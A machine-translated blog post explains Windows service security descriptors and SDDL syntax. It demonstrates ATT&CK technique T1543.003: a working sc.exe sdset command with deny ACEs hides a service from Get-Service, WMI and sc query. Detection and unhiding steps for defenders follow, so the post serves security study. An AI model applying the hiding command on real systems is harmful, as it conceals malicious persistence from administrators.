当前位置:网站首页>[t1543.003] using ACL to hide malicious windows services

[t1543.003] using ACL to hide malicious windows services

2020-11-10 16:28:47 CN Simo

See an article article It's about setting DACL hide Windows Service information , I'll make a summary .

Technical principle

Every... In the system Service stay Windows All belong to one kind of object (Object), The user's permission to access the object is described by the security information bound to the object (Security Descriptors) Limited by , for example modify 、 Delete 、 Read and write permissions .

since Service It's also an object , Then you can modify the security description information of the service in some way , Make a certain type of user unable to view 、 Modify the service information and stop deleting the service .

Security description information structure and setting mode

the MSDN The description shows that , A security description information structure includes the following information :

  • SIDs: The owner and group information of the object
  • DACL: Used to permit 、 Deny specified user / Group access to the object
  • SACL: Generate an audit log for the type of access you are trying to access
  • A set of control bits : Used to define the meaning of a security descriptor or its individual members .

The corresponding structure definition SECURITY_DESCRIPTOR :

typedef struct _SECURITY_DESCRIPTOR {
  BYTE                        Revision;
  BYTE                        Sbz1;
  SECURITY_DESCRIPTOR_CONTROL Control;
  PSID                        Owner;
  PSID                        Group;
  PACL                        Sacl;
  PACL                        Dacl;
} SECURITY_DESCRIPTOR, *PISECURITY_DESCRIPTOR;

But the program or the user can't directly control this information , Must pass Windows Provided API Set up or query .

This leads to different kinds of objects , There may be different ways to set these security descriptions :

  • Some can go directly through UI Interface settings , For example, file objects .
  • Some need to go through Windows Built in commands to set , For example, the service object .
  • Some have to use the system API Finish the work , For example, the process 、 Threads .

For these security descriptions ,Windows A simple string representation is provided separately , It's officially called “ Security Descriptor Definition Language ”(SDDL), Here's a summary SDDL Things that are .

Security Descriptor Definition Language (SDDL)

Reference resources MSDN You know ,SDDL and SECURITY_DESCRIPTOR The transformation between structures is through two API To carry out mutual rotation :

therefore , This provides great convenience for setting security descriptors , Here are some basic concepts .

Basic concepts

  • Securable Object: Security object , Is to have SD ( Security descriptor ) Of Windows The object of , All the named Windows All objects are secure objects , But some unnamed objects are safe objects , Such as : Processes and threads , There are also security descriptors SD.
  • SID: Each user / Group SID, Used to identify users / Group .
  • ACL: Access control list , The linked list actually consists of two tables :DACL and SACL.
  • DACL: Free access control list , Used to permit 、 Deny specified user / Group access to the object .
  • SACL: System access control list , Generate an audit log for the type of access you are trying to access .
  • ACE: Access control , Is the smallest unit of access control list .
  • SDDL: Security Descriptor Definition Language , A format language that uses strings to represent security description information .

ACE

ACE Constitute the DACL and SACL, It can be understood as SD( Security descriptor ) Minimum storage unit of , His format is as follows :

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;(resource_attribute)

Empty means unlimited , A common combination of strategies might look like this :

ace_type;;rights;;;account_sid;

ace_type

ace_type There's a lot of , See MSDN, This field can represent the type of policy applied to this rule , for example :

"A"	SDDL_ACCESS_ALLOWED	ACCESS_ALLOWED_ACE_TYPE
"D"	SDDL_ACCESS_DENIED	ACCESS_DENIED_ACE_TYPE

rights

according to MSDN It can be seen that , For different types of objects , The name of permission constant is not uniform ,Wayne Martin Part of his article is given ADS、SCM、Service、value、SDDL The mapping relation of :

"CC"  ADS_RIGHT_DS_CREATE_CHILD          = 0x1,    SC_MANAGER_CONNECT, SERVICE_QUERY_CONFIG
"DC"  ADS_RIGHT_DS_DELETE_CHILD          = 0x2,    SC_MANAGER_CREATE_SERVICE, SERVICE_CHANGE_CONFIG
"LC"  ADS_RIGHT_ACTRL_DS_LIST            = 0x4,    SC_MANAGER_ENUMERATE_SERVICE, SERVICE_QUERY_STATUS
"SW"  ADS_RIGHT_DS_SELF                  = 0x8,    SC_MANAGER_LOCK, SERVICE_ENUMERATE_DEPENDENTS
"RP"  ADS_RIGHT_DS_READ_PROP             = 0x10,   SC_MANAGER_QUERY_LOCK_STATUS, SERVICE_START, 
"WP"  ADS_RIGHT_DS_WRITE_PROP            = 0x20,   SC_MANAGER_MODIFY_BOOT_CONFIG, SERVICE_STOP
"DT"  ADS_RIGHT_DS_DELETE_TREE           = 0x40,   SERVICE_PAUSE_CONTINUE
"LO"  ADS_RIGHT_DS_LIST_OBJECT           = 0x80,   SERVICE_INTERROGATE
"CR"  ADS_RIGHT_DS_CONTROL_ACCESS        = 0x100   SERVICE_USER_DEFINED_CONTROL
"RC"  READ_CONTROL                       = 0x20000 READ_CONTROL
"SD"  ADS_RIGHT_DELETE                   = 0x10000 DELETE

SCM and Servcie Permission descriptor for , come from Service Security and Access Rights - MSDN

SERVICE_QUERY_CONFIG (0x0001) Required to call the QueryServiceConfig and QueryServiceConfig2 functions to query the service configuration. 
SERVICE_CHANGE_CONFIG (0x0002) Required to call the ChangeServiceConfig or ChangeServiceConfig2 function to change the service configuration. Because this grants the caller the right to change the executable file that the system runs, it should be granted only to administrators.  
SERVICE_QUERY_STATUS (0x0004) Required to call the QueryServiceStatusEx function to ask the service control manager about the status of the service. 
SERVICE_ENUMERATE_DEPENDENTS (0x0008) Required to call the EnumDependentServices function to enumerate all the services dependent on the service. 
SERVICE_START (0x0010) Required to call the StartService function to start the service. 
SERVICE_STOP (0x0020) Required to call the ControlService function to stop the service. 
SERVICE_PAUSE_CONTINUE (0x0040) Required to call the ControlService function to pause or continue the service. 
SERVICE_INTERROGATE (0x0080) Required to call the ControlService function to ask the service to report its status immediately. 
SERVICE_USER_DEFINED_CONTROL(0x0100) Required to call the ControlService function to specify a user-defined control code. 
SERVICE_ALL_ACCESS (0xF01FF) Includes STANDARD_RIGHTS_REQUIRED in addition to all access rights in this table. 
READ_CONTROL Required to call the QueryServiceObjectSecurity function to query the security descriptor of the service object. 

SC_MANAGER_CONNECT (0x0001) Required to connect to the service control manager. 
SC_MANAGER_CREATE_SERVICE (0x0002) Required to call the CreateService function to create a service object and add it to the database. 
SC_MANAGER_ENUMERATE_SERVICE (0x0004) Required to call the EnumServicesStatusEx function to list the services that are in the database. 
SC_MANAGER_LOCK (0x0008) Required to call the LockServiceDatabase function to acquire a lock on the database. 
SC_MANAGER_QUERY_LOCK_STATUS (0x0010) 
SC_MANAGER_MODIFY_BOOT_CONFIG (0x0020) Required to call the NotifyBootConfigStatus function. 
SC_MANAGER_ALL_ACCESS (0xF003F) Includes STANDARD_RIGHTS_REQUIRED, in addition to all access rights in this table. 

SDDL and ADS Relation mapping , come from ACE Strings - MSDN

"RC"  SDDL_READ_CONTROL  READ_CONTROL 
"RP"  SDDL_READ_PROPERTY  ADS_RIGHT_DS_READ_PROP  
"WP"  SDDL_WRITE_PROPERTY  ADS_RIGHT_DS_WRITE_PROP  
"CC"  SDDL_CREATE_CHILD  ADS_RIGHT_DS_CREATE_CHILD  
"DC"  SDDL_DELETE_CHILD  ADS_RIGHT_DS_DELETE_CHILD  
"LC"  SDDL_LIST_CHILDREN  ADS_RIGHT_ACTRL_DS_LIST  
"SW"  SDDL_SELF_WRITE  ADS_RIGHT_DS_SELF  
"LO"  SDDL_LIST_OBJECT  ADS_RIGHT_DS_LIST_OBJECT  
"DT"  SDDL_DELETE_TREE  ADS_RIGHT_DS_DELETE_TREE  
"CR"  SDDL_CONTROL_ACCESS  ADS_RIGHT_DS_CONTROL_ACCESS  

ADS The enumeration value of , come from ads_rights_enum - systemmanager

typedef enum 
{
  ADS_RIGHT_DELETE = 0x10000, 
  ADS_RIGHT_READ_CONTROL = 0x20000, 
  ADS_RIGHT_WRITE_DAC = 0x40000, 
  ADS_RIGHT_WRITE_OWNER = 0x80000, 
  ADS_RIGHT_SYNCHRONIZE = 0x100000, 
  ADS_RIGHT_ACCESS_SYSTEM_SECURITY = 0x1000000, 
  ADS_RIGHT_GENERIC_READ = 0x80000000, 
  ADS_RIGHT_GENERIC_WRITE = 0x40000000, 
  ADS_RIGHT_GENERIC_EXECUTE = 0x20000000, 
  ADS_RIGHT_GENERIC_ALL = 0x10000000, 
  ADS_RIGHT_DS_CREATE_CHILD = 0x1, 
  ADS_RIGHT_DS_DELETE_CHILD = 0x2, 
  ADS_RIGHT_ACTRL_DS_LIST = 0x4, 
  ADS_RIGHT_DS_SELF = 0x8, 
  ADS_RIGHT_DS_READ_PROP = 0x10, 
  ADS_RIGHT_DS_WRITE_PROP = 0x20, 
  ADS_RIGHT_DS_DELETE_TREE = 0x40, 
  ADS_RIGHT_DS_LIST_OBJECT = 0x80, 
  ADS_RIGHT_DS_CONTROL_ACCESS = 0x100
} ADS_RIGHTS_ENUM;

account_sid

SID Used to identify The owner or Subordinate to the group , stay ACE Medium account_sid It could be a SID(S-R-I-S-S) Or in Sddl.h The string constant defined in , These string constants are also known as “ Generally known SID”:

"AN"    SDDL_ANONYMOUS                  Anonymous logon. The corresponding RID is SECURITY_ANONYMOUS_LOGON_RID.
"AO"    SDDL_ACCOUNT_OPERATORS          Account operators. The corresponding RID is DOMAIN_ALIAS_RID_ACCOUNT_OPS.
"AU"    SDDL_AUTHENTICATED_USERS        Authenticated users. The corresponding RID is SECURITY_AUTHENTICATED_USER_RID.
"BA"    SDDL_BUILTIN_ADMINISTRATORS     Built-in administrators. The corresponding RID is DOMAIN_ALIAS_RID_ADMINS.
"BG"    SDDL_BUILTIN_GUESTS             Built-in guests. The corresponding RID is DOMAIN_ALIAS_RID_GUESTS.
"BO"    SDDL_BACKUP_OPERATORS           Backup operators. The corresponding RID is DOMAIN_ALIAS_RID_BACKUP_OPS.
"BU"    SDDL_BUILTIN_USERS              Built-in users. The corresponding RID is DOMAIN_ALIAS_RID_USERS.
"CA"    SDDL_CERT_SERV_ADMINISTRATORS   Certificate publishers. The corresponding RID is DOMAIN_GROUP_RID_CERT_ADMINS.
"CD"    SDDL_CERTSVC_DCOM_ACCESS        Users who can connect to certification authorities using Distributed Component Object Model (DCOM). The corresponding RID is DOMAIN_ALIAS_RID_CERTSVC_DCOM_ACCESS_GROUP.
"CG"    SDDL_CREATOR_GROUP              Creator group. The corresponding RID is SECURITY_CREATOR_GROUP_RID.
"CO"    SDDL_CREATOR_OWNER              Creator owner. The corresponding RID is SECURITY_CREATOR_OWNER_RID.
"DA"    SDDL_DOMAIN_ADMINISTRATORS      Domain administrators. The corresponding RID is DOMAIN_GROUP_RID_ADMINS.
"DC"    SDDL_DOMAIN_COMPUTERS           Domain computers. The corresponding RID is DOMAIN_GROUP_RID_COMPUTERS.
"DD"    SDDL_DOMAIN_DOMAIN_CONTROLLERS  Domain controllers. The corresponding RID is DOMAIN_GROUP_RID_CONTROLLERS.
"DG"    SDDL_DOMAIN_GUESTS              Domain guests. The corresponding RID is DOMAIN_GROUP_RID_GUESTS.
"DU"    SDDL_DOMAIN_USERS               Domain users. The corresponding RID is DOMAIN_GROUP_RID_USERS.
"EA"    SDDL_ENTERPRISE_ADMINS              Enterprise administrators. The corresponding RID is DOMAIN_GROUP_RID_ENTERPRISE_ADMINS.
"ED"    SDDL_ENTERPRISE_DOMAIN_CONTROLLERS  Enterprise domain controllers. The corresponding RID is SECURITY_SERVER_LOGON_RID.
"HI"    SDDL_ML_HIGH                    High integrity level. The corresponding RID is SECURITY_MANDATORY_HIGH_RID.
"IU"    SDDL_INTERACTIVE                Interactively logged-on user. This is a group identifier added to the token of a process when it was logged on interactively. The corresponding logon type is LOGON32_LOGON_INTERACTIVE. The corresponding RID is SECURITY_INTERACTIVE_RID.
"LA"    SDDL_LOCAL_ADMIN                Local administrator. The corresponding RID is DOMAIN_USER_RID_ADMIN.
"LG"    SDDL_LOCAL_GUEST                Local guest. The corresponding RID is DOMAIN_USER_RID_GUEST.
"LS"    SDDL_LOCAL_SERVICE              Local service account. The corresponding RID is SECURITY_LOCAL_SERVICE_RID.
"LW"    SDDL_ML_LOW Low                 integrity level. The corresponding RID is SECURITY_MANDATORY_LOW_RID.
"ME"    SDDL_MLMEDIUM                   Medium integrity level. The corresponding RID is SECURITY_MANDATORY_MEDIUM_RID.
"MU"    SDDL_PERFMON_USERS              Performance Monitor users.
"NO"    SDDL_NETWORK_CONFIGURATION_OPS  Network configuration operators. The corresponding RID is DOMAIN_ALIAS_RID_NETWORK_CONFIGURATION_OPS.
"NS"    SDDL_NETWORK_SERVICE            Network service account. The corresponding RID is SECURITY_NETWORK_SERVICE_RID.
"NU"    SDDL_NETWORK                    Network logon user. This is a group identifier added to the token of a process when it was logged on across a network. The corresponding logon type is LOGON32_LOGON_NETWORK. The corresponding RID is SECURITY_NETWORK_RID.
"PA"    SDDL_GROUP_POLICY_ADMINS        Group Policy administrators. The corresponding RID is DOMAIN_GROUP_RID_POLICY_ADMINS.
"PO"    SDDL_PRINTER_OPERATORS          Printer operators. The corresponding RID is DOMAIN_ALIAS_RID_PRINT_OPS.
"PS"    SDDL_PERSONAL_SELF              Principal self. The corresponding RID is SECURITY_PRINCIPAL_SELF_RID.
"PU"    SDDL_POWER_USERS                Power users. The corresponding RID is DOMAIN_ALIAS_RID_POWER_USERS.
"RC"    SDDL_RESTRICTED_CODE            Restricted code. This is a restricted token created using the CreateRestrictedToken function. The corresponding RID is SECURITY_RESTRICTED_CODE_RID.
"RD"    SDDL_REMOTE_DESKTOP             Terminal server users. The corresponding RID is DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS.
"RE"    SDDL_REPLICATOR                 Replicator. The corresponding RID is DOMAIN_ALIAS_RID_REPLICATOR.
"RO"    SDDL_ENTERPRISE_RO_DCs          Enterprise Read-only domain controllers. The corresponding RID is DOMAIN_GROUP_RID_ENTERPRISE_READONLY_DOMAIN_CONTROLLERS.
"RS"    SDDL_RAS_SERVERS                RAS servers group. The corresponding RID is DOMAIN_ALIAS_RID_RAS_SERVERS.
"RU"    SDDL_ALIAS_PREW2KCOMPACC        Alias to grant permissions to accounts that use applications compatible with operating systems previous to Windows 2000. The corresponding RID is DOMAIN_ALIAS_RID_PREW2KCOMPACCESS.
"SA"    SDDL_SCHEMA_ADMINISTRATORS      Schema administrators. The corresponding RID is DOMAIN_GROUP_RID_SCHEMA_ADMINS.
"SI"    SDDL_ML_SYSTEM                  System integrity level. The corresponding RID is SECURITY_MANDATORY_SYSTEM_RID.
"SO"    SDDL_SERVER_OPERATORS           Server operators. The corresponding RID is DOMAIN_ALIAS_RID_SYSTEM_OPS.
"SU"    SDDL_SERVICE                    Service logon user. This is a group identifier added to the token of a process when it was logged as a service. The corresponding logon type is LOGON32_LOGON_SERVICE. The corresponding RID is SECURITY_SERVICE_RID.
"SY"    SDDL_LOCAL_SYSTEM               Local system. The corresponding RID is SECURITY_LOCAL_SYSTEM_RID.
"WD"    SDDL_EVERYONE                   Everyone. The corresponding RID is SECURITY_WORLD_RID.

ACL Inherit

Tentatively .

utilize SDDL Set hidden Services

For normal added services , Use powershell or sc.exe You can view the information of the service directly :

PS C:\WINDOWS\system32> Get-Service -Name SWCUEngine

Status   Name               DisplayName
------   ----               -----------
Running  SWCUEngine         SWCUEngine

By modifying the service's SD after , An error will be reported when querying the service information ”ObjectNotFound“, In order to achieve the purpose of hiding :

PS C:\WINDOWS\system32> & $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
[SC] SetServiceObjectSecurity SUCCESS
PS C:\WINDOWS\system32> Get-Service -Name SWCUEngine
Get-Service : Cannot find any service with service name 'SWCUEngine'.
At line:1 char:1
+ Get-Service -Name SWCUEngine
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (SWCUEngine:String) [Get-Service], ServiceCommandException
    + FullyQualifiedErrorId : NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand

Take a look at the settings ACE,“D:” Express DACL surface , Multiple ACE They are separated by semicolons and brackets

“D;;DCLCWPDTSD;;;IU”: Deny interactive users the following permissions :

  • DC: SERVICE_CHANGE_CONFIG Modify service configuration
  • LC: SERVICE_QUERY_STATUS Query service status
  • WP: SERVICE_STOP Out of Service
  • DT: SERVICE_PAUSE_CONTINUE Pause and start the service
  • SD: DELETE Delete service

“S:” Express SACL surface ,“AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD” Indicates that anyone has an audit record of the failed operations of the service .

After hiding , Whether it's services.exe、Get-Service、sc query Or any other control tool about the service cannot retrieve the corresponding information , The effect is as follows :

# There is no information in the following three ways to query service information 
PS C:\WINDOWS\system32> Get-Service | Select-Object Name | Select-String -Pattern 'SWCUEngine'
PS C:\WINDOWS\system32> Get-WmiObject Win32_Service | Select-String -Pattern 'SWCUEngine'
PS C:\WINDOWS\system32> & $env:SystemRoot\System32\sc.exe query | Select-String -Pattern 'SWCUEngine'
PS C:\WINDOWS\system32

If the blue team knows the name of the malicious service , You can judge by stopping the echo of the service , for example :

#  Stop what doesn't exist JoshNoSuchService Service gets  InvalidOperationException  abnormal 
PS C:\WINDOWS\system32> Set-Service -Name JoshNoSuchService -Status Stopped
Set-Service : Service JoshNoSuchService was not found on computer '.'.
At line:1 char:1
+ Set-Service -Name JoshNoSuchService -Status Stopped
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (.:String) [Set-Service], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.SetServiceCommand

#  Stop being there but hidden SWCUEngine Service gets ServiceCommandException abnormal 
PS C:\WINDOWS\system32> Set-Service -Name SWCUEngine -Status Stopped
Set-Service : Service 'SWCUEngine (SWCUEngine)' cannot be configured due to the following error: Access is denied
At line:1 char:1
+ Set-Service -Name SWCUEngine -Status Stopped
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (System.ServiceProcess.ServiceController:ServiceController) [Set-Service],
   ServiceCommandException
    + FullyQualifiedErrorId : CouldNotSetService,Microsoft.PowerShell.Commands.SetServiceCommand

After judging the existence of , It's also easy to unhide :

#  Use sc.exe Modify the target service SDDL Syntax implementation unhide 
PS C:\WINDOWS\system32> & $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
[SC] SetServiceObjectSecurity SUCCESS

#  Now use  Get-Serice  The command can view the corresponding service information 
PS C:\WINDOWS\system32> Get-Service -Name 'SWCUEngine'

Status   Name               DisplayName
------   ----               -----------
Running  SWCUEngine         SWCUEngine

quote

版权声明
本文为[CN Simo]所创,转载请带上原文链接,感谢